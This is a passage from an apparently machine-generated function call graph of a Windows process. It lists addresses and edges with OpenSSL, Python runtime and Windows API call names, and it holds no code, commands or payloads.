91142->91135 91142->91137 91142->91138 91143->91122 91144->91138 91145->91138 91147 7ffbaa58dc7d 91146->91147 91154 7ffbaa58dccb 91146->91154 91148 7ffbaa58dcb4 memcpy 91147->91148 91149 7ffbaa58dc94 memcpy 91147->91149 91148->91154 91158 7ffbaa58dc99 91149->91158 91150 7ffbaa58dcf4 ReadFile 91151 7ffbaa58dd8a 91150->91151 91150->91154 91152 7ffbaa58ddba 91151->91152 91161 7ffbaa5894b0 14 API calls 91151->91161 91155 7ffbaa58ddc9 memset 91152->91155 91152->91158 91154->91150 91154->91151 91156 7ffbaa58dd64 91154->91156 91155->91158 91160 7ffbaa58da80 19 API calls 91156->91160 91158->91127 91159->91124 91160->91158 91161->91152 91162->91069 91163->91070 91164 7ffbab72fae0 91165 7ffbab72faf0 91164->91165 91166 7ffbab72fb00 ERR_new ERR_set_debug ERR_set_error 91165->91166 91167 7ffbab72fb3b 91165->91167 91168 7ffbab72fb75 ASYNC_get_current_job 91167->91168 91169 7ffbab72fb7f 91167->91169 91168->91169 91170 7ffbab6b252e 91171 7ffbab6b2543 91170->91171 91172 7ffbab6b2534 91170->91172 91178 7ffbab6a4640 PyImport_ImportModuleLevelObject 91171->91178 91172->91171 91173 7ffbab6b253a _Py_Dealloc 91172->91173 91173->91171 91177 7ffbab6b382e 91179 7ffbab6a4683 91178->91179 91180 7ffbab6a47fb 91178->91180 91179->91180 91181 7ffbab6a46b0 PyObject_GetAttr 91179->91181 91183 7ffbab6a477b PyErr_Clear PyModule_GetFilenameObject PyUnicode_FromFormat PyErr_SetImportError 91179->91183 91185 7ffbab6a4735 PyObject_SetItem 91179->91185 91186 7ffbab6a472d PyDict_SetItem 91179->91186 91189 7ffbab6a47e7 91179->91189 91190 7ffbab6a4709 _Py_Dealloc 91179->91190 91193 7ffbab6a4748 _Py_Dealloc 91179->91193 91195 7ffbab6a3880 10 API calls 91180->91195 91181->91179 91182 7ffbab6a46cb PyUnicode_FromFormat 91181->91182 91182->91183 91184 7ffbab6a46ef PyObject_GetItem 91182->91184 91187 7ffbab6a47c4 91183->91187 91188 7ffbab6a47d3 91183->91188 91184->91179 91185->91179 91186->91179 91187->91188 91191 7ffbab6a47ca _Py_Dealloc 91187->91191 91188->91189 91192 7ffbab6a47de _Py_Dealloc 91188->91192 91189->91180 91194 7ffbab6a47f2 _Py_Dealloc 91189->91194 91190->91179 91191->91188 91192->91189 91193->91179 91194->91180 91195->91177 91196 7ffbab758a90 91197 7ffbab758aa0 91196->91197 91198 7ffbab758b02 CRYPTO_malloc 91197->91198 91200 7ffbab758b6e 91197->91200 91199 7ffbab758b2f ERR_new ERR_set_debug 91198->91199 91198->91200 91201 7ffbab758b61 91199->91201 91202 7ffbab758810 91203 7ffbab758834 91202->91203 91204 7ffbab758897 CRYPTO_malloc 91203->91204 91209 7ffbab7588cc 91203->91209 91205 7ffbab7588bb ERR_new ERR_set_debug 91204->91205 91204->91209 91210 7ffbab7589a3 91205->91210 91207 7ffbab75894e CRYPTO_free 91208 7ffbab758969 CRYPTO_malloc 91207->91208 91208->91205 91208->91209 91209->91207 91209->91208 91209->91210 91211 7ffbab755770 91212 7ffbab75578f 91211->91212 91213 7ffbab7558e7 91212->91213 91242 7ffbab7558a3 91212->91242 91261 7ffbab711f87 CRYPTO_free CRYPTO_malloc ERR_new ERR_set_debug 91212->91261 91215 7ffbab75598c 91213->91215 91217 7ffbab755923 EVP_MD_CTX_get0_md 91213->91217 91213->91242 91216 7ffbab755abc 91215->91216 91222 7ffbab755ac5 91215->91222 91230 7ffbab7559bc 91215->91230 91218 7ffbab755a57 91216->91218 91216->91222 91217->91215 91219 7ffbab755934 EVP_MD_CTX_get0_md EVP_MD_get_size 91217->91219 91225 7ffbab755a6c 91218->91225 91232 7ffbab755b9a 91218->91232 91219->91215 91220 7ffbab755950 ERR_new ERR_set_debug 91219->91220 91220->91242 91221 7ffbab755b22 ERR_new ERR_set_debug 91221->91242 91222->91221 91226 7ffbab755aae 91222->91226 91223 7ffbab755d15 memset 91258 7ffbab755d3b 91223->91258 91259 7ffbab7560fc 91223->91259 91224 7ffbab755b5e ERR_new ERR_set_debug 91224->91242 91225->91224 91225->91226 91226->91223 91236 7ffbab755c8b EVP_CIPHER_CTX_get0_cipher EVP_CIPHER_get_mode 91226->91236 91227 7ffbab75612f 91262 7ffbab7126fd 27 API calls 91227->91262 91228 7ffbab7561b6 91237 7ffbab7561c9 91228->91237 91253 7ffbab7561e8 91228->91253 91229 7ffbab755cd6 ERR_new 91233 7ffbab75649e ERR_set_debug 91229->91233 91230->91218 91234 7ffbab755a1e ERR_new ERR_set_debug 91230->91234 91230->91242 91232->91226 91232->91229 91233->91242 91234->91242 91235 7ffbab756134 91239 7ffbab75613d 91235->91239 91235->91253 91238 7ffbab755ca2 EVP_CIPHER_CTX_get_iv_length 91236->91238 91241 7ffbab755ce5 91236->91241 91237->91242 91243 7ffbab7561d9 ERR_new 91237->91243 91240 7ffbab755cae ERR_new ERR_set_debug 91238->91240 91238->91241 91239->91242 91244 7ffbab75614d ERR_new 91239->91244 91240->91242 91241->91223 91243->91233 91244->91233 91245 7ffbab756494 ERR_new 91245->91233 91246 7ffbab7561a7 ERR_new 91246->91233 91247 7ffbab756488 ERR_new 91247->91233 91248 7ffbab756451 ERR_new 91248->91233 91249 7ffbab755ef2 ERR_new ERR_set_debug 91249->91242 91250 7ffbab756198 ERR_new 91250->91233 91251 7ffbab75647c ERR_new 91251->91233 91252 7ffbab75645d 91252->91242 91254 7ffbab756462 ERR_new 91252->91254 91253->91242 91253->91245 91253->91247 91253->91248 91253->91251 91253->91252 91254->91233 91255 7ffbab75616b ERR_new 91255->91233 91256 7ffbab756189 ERR_new 91256->91233 91257 7ffbab75617a ERR_new 91257->91233 91258->91246 91258->91249 91258->91250 91258->91255 91258->91256 91258->91257 91258->91259 91260 7ffbab75615c ERR_new 91258->91260 91259->91227 91259->91228 91260->91233 91261->91213 91262->91235 91263 7ffbab6a8ec3 91294 7ffbab6a41e0 91263->91294 91265 7ffbab6a8f07 91266 7ffbab6a8f43 91265->91266 91270 7ffbab6a8f1e 91265->91270 91267 7ffbab6a8f69 91266->91267 91271 7ffbab6a8f60 _Py_Dealloc 91266->91271 91268 7ffbab6a8f81 91267->91268 91272 7ffbab6a8f78 _Py_Dealloc 91267->91272 91269 7ffbab6a8fa4 91268->91269 91275 7ffbab6a8f9e _Py_Dealloc 91268->91275 91273 7ffbab6a8fc7 91269->91273 91279 7ffbab6a8fc1 _Py_Dealloc 91269->91279 91274 7ffbab6a8f31 91270->91274 91276 7ffbab6a8f28 _Py_Dealloc 91270->91276 91271->91267 91272->91268 91277 7ffbab6a8fea 91273->91277 91280 7ffbab6a8fe4 _Py_Dealloc 91273->91280 91275->91269 91276->91274 91278 7ffbab6a900d 91277->91278 91281 7ffbab6a9007 _Py_Dealloc 91277->91281 91282 7ffbab6a902a _Py_Dealloc 91278->91282 91283 7ffbab6a9030 91278->91283 91279->91273 91280->91277 91281->91278 91282->91283 91285 7ffbab6a9053 91283->91285 91287 7ffbab6a904d _Py_Dealloc 91283->91287 91284 7ffbab6a9076 91286 7ffbab6a9099 91284->91286 91290 7ffbab6a9093 _Py_Dealloc 91284->91290 91285->91284 91289 7ffbab6a9070 _Py_Dealloc 91285->91289 91288 7ffbab6a90bc 91286->91288 91292 7ffbab6a90b6 _Py_Dealloc 91286->91292 91287->91285 91291 7ffbab6a90df 91288->91291 91293 7ffbab6a90d9 _Py_Dealloc 91288->91293 91289->91284 91290->91286 91292->91288 91293->91291 91297 7ffbab6a421a 91294->91297 91295 7ffbab6a44b1 PyFloat_FromDouble 91300 7ffbab6a4614 91295->91300 91301 7ffbab6a4471 91295->91301 91296 7ffbab6a42d5 PyUnicode_FromStringAndSize 91296->91300 91302 7ffbab6a42fd PyUnicode_InternInPlace 91296->91302 91297->91296 91304 7ffbab6a432f 91297->91304 91298 7ffbab6a43ea 91298->91298 91298->91301 91303 7ffbab6a4430 PyLong_FromString 91298->91303 91299 7ffbab6a43a5 PyBytes_FromStringAndSize 91299->91300 91299->91304 91300->91265 91301->91295 91307 7ffbab6a44d7 91301->91307 91302->91297 91303->91298 91303->91300 91304->91298 91304->91299 91304->91304 91305 7ffbab6a4510 PyComplex_FromDoubles 91305->91300 91305->91307 91306 7ffbab6a4550 PyTuple_New 91306->91300 91308 7ffbab6a453b 91306->91308 91307->91305 91307->91308 91308->91306 91310 7ffbab6a45ac 91308->91310 91309 7ffbab6a45c0 PyFrozenSet_New 91309->91300 91309->91310 91310->91300 91310->91309 91311 7ffbab6a45f4 PySet_Add 91310->91311 91311->91300 91311->91310 91312 7ffbab780710 91313 7ffbab780728 91312->91313 91314 7ffbab780866 91313->91314 91316 7ffbab78086d 91313->91316 91317 7ffbab780836 ERR_new ERR_set_debug 91313->91317 91319 7ffbab711c1c 91313->91319 91315 7ffbab7808ce ERR_new ERR_set_debug 91315->91314 91316->91314 91316->91315 91317->91314 91319->91313 91321 7ffbab756960 91319->91321 91320 7ffbab756a29 ERR_new 91322 7ffbab7573d5 ERR_set_debug 91320->91322 91321->91320 91323 7ffbab756a52 91321->91323 91345 7ffbab756a38 91321->91345 91322->91323 91323->91313 91323->91323 91324 7ffbab7573cb ERR_new 91324->91322 91325 7ffbab75712e ERR_new ERR_set_debug 91325->91323 91326 7ffbab757101 ERR_new ERR_set_debug 91326->91323 91327 7ffbab75735e ERR_new 91327->91322 91328 7ffbab756c5d ERR_new ERR_set_debug 91328->91323 91329 7ffbab75722e ERR_new ERR_set_debug 91329->91323 91330 7ffbab756fc5 ERR_new ERR_set_debug 91330->91323 91331 7ffbab75728c ERR_new ERR_set_debug 91331->91323 91332 7ffbab756e59 memcpy 91332->91345 91333 7ffbab75736a ERR_new 91336 7ffbab75733d ERR_set_debug 91333->91336 91334 7ffbab757030 memcpy 91334->91345 91335 7ffbab757333 ERR_new 91335->91336 91336->91323 91337 7ffbab75725b 91340 7ffbab75726a BIO_clear_flags BIO_set_flags 91337->91340 91338 7ffbab75707c OPENSSL_cleanse 91338->91345 91339 7ffbab75730c ERR_new ERR_set_debug 91339->91323 91340->91323 91341 7ffbab757300 ERR_new 91342 7ffbab7572ce ERR_set_debug 91341->91342 91342->91323 91343 7ffbab757201 ERR_new ERR_set_debug 91343->91323 91344 7ffbab757193 ERR_new ERR_set_debug 91344->91323 91345->91323 91345->91324 91345->91325 91345->91326 91345->91327 91345->91328 91345->91329 91345->91330 91345->91331 91345->91332 91345->91333 91345->91334 91345->91335 91345->91337 91345->91338 91345->91339 91345->91341 91345->91343 91345->91344 91346 7ffbab7572c4 ERR_new 91345->91346 91347 7ffbab757166 ERR_new ERR_set_debug 91345->91347 91348 7ffbab756dde ERR_new ERR_set_debug 91345->91348 91346->91342 91347->91323 91348->91323 91349 7ffbab76ec70 91357 7ffbab76ec8c 91349->91357 91350 7ffbab76ed22 ERR_new ERR_set_debug 91353 7ffbab76ef51 91350->91353 91351 7ffbab76f005 91352 7ffbab76f011 ERR_new 91351->91352 91351->91353 91354 7ffbab76f01b ERR_set_debug 91352->91354 91354->91353 91355 7ffbab76efec 91356 7ffbab76eff6 ERR_new 91355->91356 91356->91351 91357->91350 91357->91351 91357->91353 91357->91355 91358 7ffbab76efd3 91357->91358 91360 7ffbab76ef8a 91357->91360 91364 7ffbab7708b2 91357->91364 91367 7ffbab770672 91357->91367 91359 7ffbab76efdd ERR_new 91358->91359 91359->91355 91360->91353 91361 7ffbab76efa4 ERR_new 91360->91361 91361->91354 91371 7ffbab711d43 91364->91371 91366 7ffbab7706d1 91366->91357 91368 7ffbab7706a6 91367->91368 91370 7ffbab770682 91367->91370 91369 7ffbab711d43 BIO_ctrl 91368->91369 91369->91370 91370->91357 91371->91366 91372 7ffbab76ec10 91371->91372 91373 7ffbab76ec1c BIO_ctrl 91372->91373 91374 7ffbab76ec3f 91373->91374 91374->91366 91375 7ffbab71ee30 91376 7ffbab711325 91375->91376 91377 7ffbab71ee50 SetLastError 91376->91377 91378 7ffbab71ee70 91377->91378 91380 7ffbab711c1c 37 API calls 91378->91380 91379 7ffbab71eeab 91380->91379 91381 7ffbab737df0 91382 7ffbab737e0a 91381->91382 91383 7ffbab737e20 ERR_new ERR_set_debug ERR_set_error 91382->91383 91384 7ffbab737e58 91382->91384 91388 7ffbab737e5e 91383->91388 91385 7ffbab737eec ERR_new ERR_set_debug ERR_set_error 91384->91385 91386 7ffbab737e7a 91384->91386 91384->91388 91385->91388 91387 7ffbab737e8d ASYNC_get_current_job 91386->91387 91386->91388 91387->91388 91389 7ffbaa5df610 91390 7ffbaa5df63c 91389->91390 91392 7ffbaa5df641 91389->91392 91402 7ffbaa6028a0 91390->91402 91393 7ffbaa5df73a 91392->91393 91399 7ffbaa5df73e 91392->91399 91401 7ffbaa5df727 91392->91401 91406 7ffbaa61b4d0 16 API calls new[] 91392->91406 91394 7ffbaa5df796 91393->91394 91395 7ffbaa5df780 91393->91395 91393->91399 91409 7ffbaa58a550 14 API calls 91394->91409 91408 7ffbaa58a550 14 API calls 91395->91408 91401->91393 91407 7ffbaa61d2e0 19 API calls new[] 91401->91407 91403 7ffbaa6028b9 91402->91403 91405 7ffbaa6028c5 91402->91405 91410 7ffbaa6027d0 91403->91410 91405->91392 91406->91401 91407->91393 91408->91399 91409->91399 91411 7ffbaa60280a 91410->91411 91414 7ffbaa602817 91410->91414 91416 7ffbaa602310 91411->91416 91413 7ffbaa60286d 91413->91405 91414->91413 91415 7ffbaa602310 87 API calls 91414->91415 91415->91414 91448 7ffbaa602010 91416->91448 91418 7ffbaa6023f7 91526 7ffbaa6aabc0 91418->91526 91419 7ffbaa602791 91525 7ffbaa5dfb70 16 API calls 91419->91525 91424 7ffbaa6023cc 91424->91418 91428 7ffbaa6024b8 91424->91428 91432 7ffbaa60249e 91424->91432 91479 7ffbaa5a2ba0 91424->91479 91426 7ffbaa602451 91427 7ffbaa602457 91426->91427 91426->91428 91427->91432 91518 7ffbaa5869b0 14 API calls new[] 91427->91518 91430 7ffbaa60255a 91428->91430 91437 7ffbaa602520 91428->91437 91519 7ffbaa5869b0 14 API calls new[] 91430->91519 91432->91418 91432->91419 91524 7ffbaa586db0 14 API calls 91432->91524 91433 7ffbaa602487 91433->91432 91436 7ffbaa60248f memcpy 91433->91436 91434 7ffbaa602679 91488 7ffbaa5892e0 91434->91488 91435 7ffbaa602633 91520 7ffbaa5869b0 14 API calls new[] 91435->91520 91436->91432 91437->91434 91437->91435 91441 7ffbaa602540 91437->91441 91441->91432 91523 7ffbaa5a3f60 56 API calls 91441->91523 91444 7ffbaa6026dd 91445 7ffbaa60270b 91444->91445 91521 7ffbaa5dcc40 86 API calls 91444->91521 91445->91441 91522 7ffbaa5dfc00 16 API calls 91445->91522 91449 7ffbaa602032 91448->91449 91469 7ffbaa6022c3 91448->91469 91450 7ffbaa60203b 91449->91450 91453 7ffbaa602053 91449->91453 91535 7ffbaa601f00 14 API calls 91450->91535 91452 7ffbaa602046 91452->91424 91456 7ffbaa602092 91453->91456 91460 7ffbaa60223d 91453->91460 91455 7ffbaa6020e4 91537 7ffbaa602bb0 memset 91455->91537 91456->91455 91536 7ffbaa601f00 14 API calls 91456->91536 91459 7ffbaa602151 91461 7ffbaa602196 91459->91461 91459->91469 91470 7ffbaa6021dc 91459->91470 91460->91469 91580 7ffbaa601f00 14 API calls 91460->91580 91576 7ffbaa5894b0 14 API calls 91461->91576 91464 7ffbaa602149 91573 7ffbaa586db0 14 API calls 91464->91573 91465 7ffbaa602153 91465->91459 91574 7ffbaa6409d0 17 API calls 91465->91574 91466 7ffbaa6021a5 91577 7ffbaa5894b0 14 API calls 91466->91577 91469->91424 91578 7ffbaa5b4a40 70 API calls 91470->91578 91472 7ffbaa6021cd 91472->91424 91474 7ffbaa602164 91575 7ffbaa601f00 14 API calls 91474->91575 91476 7ffbaa602208 91579 7ffbaa63f120 52 API calls 91476->91579 91478 7ffbaa60222e 91478->91424 91481 7ffbaa5a2bd7 91479->91481 91480 7ffbaa5a2c39 91480->91426 91481->91480 91482 7ffbaa5a2df5 91481->91482 91628 7ffbaa5a2780 91481->91628 91642 7ffbaa59a3f0 memcmp 91481->91642 91643 7ffbaa5a2ad0 15 API calls 91481->91643 91644 7ffbaa596ff0 36 API calls 91481->91644 91482->91480 91645 7ffbaa59b080 16 API calls new[] 91482->91645 91682 7ffbaa589210 91488->91682 91491 7ffbaa5fb060 91492 7ffbaa5fb096 91491->91492 91493 7ffbaa5fb08d 91491->91493 91492->91493 91517 7ffbaa5fb100 91492->91517 91740 7ffbaa5894b0 14 API calls 91493->91740 91495 7ffbaa5fb0c5 91741 7ffbaa5894b0 14 API calls 91495->91741 91497 7ffbaa5fb0ef 91497->91444 91501 7ffbaa5fb52d 91503 7ffbaa5fb5d5 91501->91503 91749 7ffbaa6409d0 17 API calls 91501->91749 91503->91444 91505 7ffbaa5fb5cd 91505->91503 91507 7ffbaa5862e0 new[] 14 API calls 91505->91507 91508 7ffbaa5fb5f6 91507->91508 91508->91503 91510 7ffbaa5fb5fe memcpy 91508->91510 91509 7ffbaa5fb566 91511 7ffbaa5fb50a 91509->91511 91748 7ffbaa5b4a40 70 API calls 91509->91748 91510->91503 91511->91501 91746 7ffbaa5b4a40 70 API calls 91511->91746 91515 7ffbaa5fb554 91747 7ffbaa586db0 14 API calls 91515->91747 91517->91509 91517->91511 91517->91515 91706 7ffbaa603160 91517->91706 91718 7ffbaa5b7e80 91517->91718 91742 7ffbaa5869b0 14 API calls new[] 91517->91742 91743 7ffbaa5b8f10 17 API calls 91517->91743 91744 7ffbaa5b0690 17 API calls 91517->91744 91745 7ffbaa5b4a40 70 API calls 91517->91745 91518->91433 91519->91441 91520->91441 91521->91445 91522->91441 91523->91432 91524->91419 91525->91418 91527 7ffbaa6aabc9 91526->91527 91528 7ffbaa6027b1 91527->91528 91529 7ffbaa6aac14 IsProcessorFeaturePresent 91527->91529 91528->91414 91530 7ffbaa6aac2c 91529->91530 91788 7ffbaa6aae08 RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 91530->91788 91532 7ffbaa6aac3f 91789 7ffbaa6aabe0 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 91532->91789 91535->91452 91536->91455 91538 7ffbaa602c80 91537->91538 91539 7ffbaa602c9b 91538->91539 91541 7ffbaa602cb9 91538->91541 91599 7ffbaa58a550 14 API calls 91539->91599 91544 7ffbaa602da7 91541->91544 91560 7ffbaa602d82 91541->91560 91542 7ffbaa602e6d 91581 7ffbaa63ccb0 91542->91581 91544->91542 91545 7ffbaa602ddd 91544->91545 91548 7ffbaa602de6 91545->91548 91549 7ffbaa602e0e 91545->91549 91547 7ffbaa603136 91550 7ffbaa6aabc0 8 API calls 91547->91550 91601 7ffbaa58a3b0 17 API calls 91548->91601 91559 7ffbaa602e46 91549->91559 91602 7ffbaa5869b0 14 API calls new[] 91549->91602 91552 7ffbaa602120 91550->91552 91552->91459 91552->91464 91552->91465 91554 7ffbaa602e1f 91555 7ffbaa602e27 memcpy 91554->91555 91554->91559 91556 7ffbaa63ccb0 15 API calls 91555->91556 91556->91559 91557 7ffbaa603064 91567 7ffbaa602cac 91557->91567 91608 7ffbaa58a3b0 17 API calls 91557->91608 91569 7ffbaa602eec 91559->91569 91603 7ffbaa5869b0 14 API calls new[] 91559->91603 91600 7ffbaa58a3b0 17 API calls 91560->91600 91561 7ffbaa602f00 91561->91557 91607 7ffbaa5b4a40 70 API calls 91561->91607 91565 7ffbaa602ecf 91566 7ffbaa602ed7 memcpy 91565->91566 91565->91569 91566->91569 91609 7ffbaa602900 15 API calls 91567->91609 91568 7ffbaa5a2ba0 51 API calls 91568->91569 91569->91561 91569->91567 91569->91568 91604 7ffbaa586db0 14 API calls 91569->91604 91605 7ffbaa5dfb70 16 API calls 91569->91605 91606 7ffbaa5a3f60 56 API calls 91569->91606 91573->91459 91574->91474 91575->91459 91576->91466 91577->91472 91578->91476 91579->91478 91580->91469 91583 7ffbaa63cd01 91581->91583 91584 7ffbaa63d00e 91583->91584 91587 7ffbaa63d0c9 91583->91587 91610 7ffbaa63c100 91583->91610 91589 7ffbaa63d13d 91584->91589 91590 7ffbaa5892e0 14 API calls 91584->91590 91592 7ffbaa63d120 91584->91592 91586 7ffbaa63d1de 91598 7ffbaa63d237 91586->91598 91623 7ffbaa612d70 15 API calls 91586->91623 91620 7ffbaa58a550 14 API calls 91587->91620 91589->91586 91622 7ffbaa5e0020 15 API calls 91589->91622 91590->91592 91621 7ffbaa5894b0 14 API calls 91592->91621 91593 7ffbaa6aabc0 8 API calls 91595 7ffbaa63d280 91593->91595 91595->91559 91596 7ffbaa63d205 91596->91598 91624 7ffbaa5cbb70 15 API calls 91596->91624 91598->91593 91599->91567 91600->91567 91601->91567 91602->91554 91603->91565 91604->91569 91605->91569 91606->91569 91607->91557 91608->91567 91609->91547 91615 7ffbaa63c144 91610->91615 91611 7ffbaa63c222 91619 7ffbaa63c240 91611->91619 91625 7ffbaa639370 14 API calls 91611->91625 91612 7ffbaa63c267 91613 7ffbaa63c2ae 91612->91613 91614 7ffbaa63c29b 91612->91614 91612->91619 91627 7ffbaa58a550 14 API calls 91613->91627 91626 7ffbaa58a550 14 API calls 91614->91626 91615->91611 91615->91612 91619->91583 91620->91584 91621->91589 91623->91596 91624->91598 91625->91619 91626->91619 91627->91619 91646 7ffbaa599ab0 91628->91646 91631 7ffbaa5a2969 91635 7ffbaa5a28b4 91631->91635 91673 7ffbaa596ff0 36 API calls 91631->91673 91632 7ffbaa5a27b1 91632->91631 91632->91635 91636 7ffbaa5a28a4 91632->91636 91670 7ffbaa59b7f0 15 API calls 91632->91670 91635->91481 91636->91631 91636->91635 91637 7ffbaa5a2947 91636->91637 91638 7ffbaa5a2917 91636->91638 91637->91631 91672 7ffbaa642590 14 API calls 91637->91672 91671 7ffbaa5985d0 14 API calls 91638->91671 91641 7ffbaa599e80 40 API calls 91641->91632 91642->91481 91643->91481 91645->91480 91647 7ffbaa599d67 91646->91647 91658 7ffbaa599ae0 91646->91658 91649 7ffbaa599e0e 91647->91649 91679 7ffbaa59e140 23 API calls 91647->91679 91648 7ffbaa599b7e 91652 7ffbaa6aabc0 8 API calls 91648->91652 91649->91648 91681 7ffbaa596a40 memset 91649->91681 91653 7ffbaa599e69 91652->91653 91653->91635 91653->91641 91654 7ffbaa599ca8 91660 7ffbaa599ccd 91654->91660 91669 7ffbaa58dc50 23 API calls 91654->91669 91655 7ffbaa599b71 91674 7ffbaa596a40 memset 91655->91674 91656 7ffbaa599dc9 91656->91649 91656->91656 91680 7ffbaa5940e0 memset 91656->91680 91658->91647 91658->91649 91658->91654 91658->91655 91665 7ffbaa599b83 91658->91665 91660->91647 91660->91649 91678 7ffbaa59b7f0 15 API calls 91660->91678 91661 7ffbaa599c75 91661->91654 91663 7ffbaa599c94 91661->91663 91662 7ffbaa599c32 91662->91661 91662->91663 91676 7ffbaa597890 21 API calls 91662->91676 91677 7ffbaa596a40 memset 91663->91677 91665->91649 91665->91662 91675 7ffbaa6425d0 14 API calls 91665->91675 91669->91660 91670->91636 91671->91635 91672->91631 91674->91648 91675->91662 91676->91661 91677->91648 91678->91647 91679->91656 91680->91649 91681->91648 91691 7ffbaa587030 91682->91691 91684 7ffbaa5892af 91687 7ffbaa6aabc0 8 API calls 91684->91687 91689 7ffbaa5892c2 91687->91689 91689->91491 91690 7ffbaa589296 91690->91684 91703 7ffbaa586db0 14 API calls 91690->91703 91694 7ffbaa58707c 91691->91694 91692 7ffbaa6aabc0 8 API calls 91693 7ffbaa5887f7 91692->91693 91693->91690 91702 7ffbaa588e30 14 API calls new[] 91693->91702 91695 7ffbaa587118 91694->91695 91696 7ffbaa58711a 91694->91696 91697 7ffbaa58710a 91694->91697 91701 7ffbaa5887bc 91694->91701 91695->91701 91705 7ffbaa588d60 14 API calls 91695->91705 91696->91695 91700 7ffbaa58711e memcpy 91696->91700 91704 7ffbaa588d60 14 API calls 91697->91704 91700->91695 91701->91692 91702->91690 91703->91684 91704->91695 91705->91701 91707 7ffbaa603198 91706->91707 91708 7ffbaa6031ee 91706->91708 91750 7ffbaa5894b0 14 API calls 91707->91750 91708->91707 91709 7ffbaa603210 91708->91709 91711 7ffbaa6031b0 91709->91711 91716 7ffbaa603215 91709->91716 91751 7ffbaa5894b0 14 API calls 91711->91751 91713 7ffbaa6031da 91713->91517 91714 7ffbaa602bb0 81 API calls 91714->91716 91715 7ffbaa60330d 91715->91517 91716->91714 91716->91715 91752 7ffbaa5e9630 16 API calls 91716->91752 91719 7ffbaa5b7ea5 91718->91719 91720 7ffbaa5b7e94 91718->91720 91721 7ffbaa5b7ebb 91719->91721 91769 7ffbaa5894b0 14 API calls 91719->91769 91768 7ffbaa5894b0 14 API calls 91720->91768 91724 7ffbaa5b7ea3 91721->91724 91725 7ffbaa5b7eff 91721->91725 91770 7ffbaa5894b0 14 API calls 91724->91770 91753 7ffbaa5b7bf0 91725->91753 91727 7ffbaa5b7ef2 91727->91517 91729 7ffbaa5b7f74 91729->91517 91732 7ffbaa5b7f23 91732->91729 91733 7ffbaa5b7f79 91732->91733 91736 7ffbaa5b7bf0 70 API calls 91732->91736 91771 7ffbaa603380 81 API calls 91732->91771 91772 7ffbaa5b6d60 70 API calls 91732->91772 91735 7ffbaa5b7f85 91733->91735 91773 7ffbaa5b0690 17 API calls 91733->91773 91735->91729 91774 7ffbaa5869b0 14 API calls new[] 91735->91774 91736->91732 91738 7ffbaa5b8007 91738->91729 91739 7ffbaa5b800f memcpy 91738->91739 91739->91729 91740->91495 91741->91497 91742->91517 91743->91517 91744->91517 91745->91517 91746->91501 91747->91511 91748->91511 91749->91505 91750->91711 91751->91713 91752->91716 91759 7ffbaa5b7c0d 91753->91759 91764 7ffbaa5b7c65 91753->91764 91754 7ffbaa5b7ce5 91775 7ffbaa5babe0 91754->91775 91755 7ffbaa5b7cde 91784 7ffbaa5b2f50 17 API calls 91755->91784 91756 7ffbaa5b7c2c 91761 7ffbaa5b7c35 91756->91761 91756->91764 91759->91756 91759->91764 91782 7ffbaa5b6d60 70 API calls 91759->91782 91767 7ffbaa5b7cfd 91761->91767 91783 7ffbaa5b4940 17 API calls 91761->91783 91763 7ffbaa5b7c56 91763->91732 91764->91754 91764->91755 91765 7ffbaa5b7ce3 91765->91767 91785 7ffbaa5b4940 17 API calls 91765->91785 91767->91732 91768->91724 91769->91721 91770->91727 91771->91732 91772->91732 91773->91735 91774->91738 91776 7ffbaa5bac6f 91775->91776 91779 7ffbaa5bacdc 91776->91779 91786 7ffbaa586db0 14 API calls 91776->91786 91778 7ffbaa5c12eb 91787 7ffbaa5b0f90 14 API calls 91778->91787 91779->91765 91781 7ffbaa5c12fa 91781->91765 91782->91759 91783->91763 91784->91765 91785->91767 91786->91778 91787->91781 91788->91532 91790 7ffbaa5a1630 91791 7ffbaa5a167c 91790->91791 91792 7ffbaa5a168e strcmp 91791->91792 91793 7ffbaa5a16a1 91791->91793 91792->91793 91794 7ffbaa5862e0 new[] 14 API calls 91793->91794 91800 7ffbaa5a170a 91794->91800 91795 7ffbaa5862e0 new[] 14 API calls 91797 7ffbaa5a1a06 91795->91797 91796 7ffbaa6aabc0 8 API calls 91798 7ffbaa5a17cf 91796->91798 91809 7ffbaa5a17b2 91797->91809 91812 7ffbaa599060 91797->91812 91801 7ffbaa5862e0 new[] 14 API calls 91800->91801 91806 7ffbaa5a17f5 91800->91806 91800->91809 91802 7ffbaa5a17a2 91801->91802 91804 7ffbaa5a17ea memcpy 91802->91804 91802->91806 91802->91809 91803 7ffbaa5a1a61 91807 7ffbaa5a1ae2 91803->91807 91810 7ffbaa5a1bd1 91803->91810 91811 7ffbaa58dc50 23 API calls 91803->91811 91804->91806 91806->91795 91806->91809 91806->91810 91807->91810 91835 7ffbaa5985d0 14 API calls 91807->91835 91809->91796 91810->91809 91836 7ffbaa5987b0 46 API calls 91810->91836 91811->91807 91813 7ffbaa599244 91812->91813 91814 7ffbaa5990f1 91812->91814 91817 7ffbaa5862e0 new[] 14 API calls 91813->91817 91829 7ffbaa599147 91813->91829 91814->91813 91815 7ffbaa59910a 91814->91815 91820 7ffbaa5862e0 new[] 14 API calls 91815->91820 91816 7ffbaa5862e0 new[] 14 API calls 91818 7ffbaa599196 91816->91818 91828 7ffbaa59927c 91817->91828 91819 7ffbaa5991a2 memset 91818->91819 91833 7ffbaa599383 91818->91833 91821 7ffbaa59920c memcpy 91819->91821 91830 7ffbaa599441 91819->91830 91822 7ffbaa599125 91820->91822 91823 7ffbaa5993ec 91821->91823 91824 7ffbaa59922e memcpy 91821->91824 91825 7ffbaa599131 memcpy 91822->91825 91822->91833 91826 7ffbaa5993ef memcpy memcpy 91823->91826 91824->91826 91825->91829 91826->91830 91827 7ffbaa599518 91827->91833 91852 7ffbaa5985d0 14 API calls 91827->91852 91828->91829 91828->91833 91851 7ffbaa6425d0 14 API calls 91828->91851 91829->91816 91829->91829 91829->91833 91830->91827 91837 7ffbaa590250 91830->91837 91833->91803 91835->91810 91836->91809 91845 7ffbaa5902a1 91837->91845 91840 7ffbaa6aabc0 8 API calls 91841 7ffbaa5908c7 91840->91841 91841->91827 91842 7ffbaa590470 CreateFileW 91842->91845 91845->91842 91846 7ffbaa5906f5 91845->91846 91848 7ffbaa590628 91845->91848 91853 7ffbaa58d2c0 91845->91853 91859 7ffbaa58fc70 23 API calls new[] 91845->91859 91860 7ffbaa590aa0 20 API calls 91845->91860 91861 7ffbaa5894b0 14 API calls 91845->91861 91862 7ffbaa58da80 19 API calls 91846->91862 91848->91840 91849 7ffbaa590720 91863 7ffbaa6425d0 14 API calls 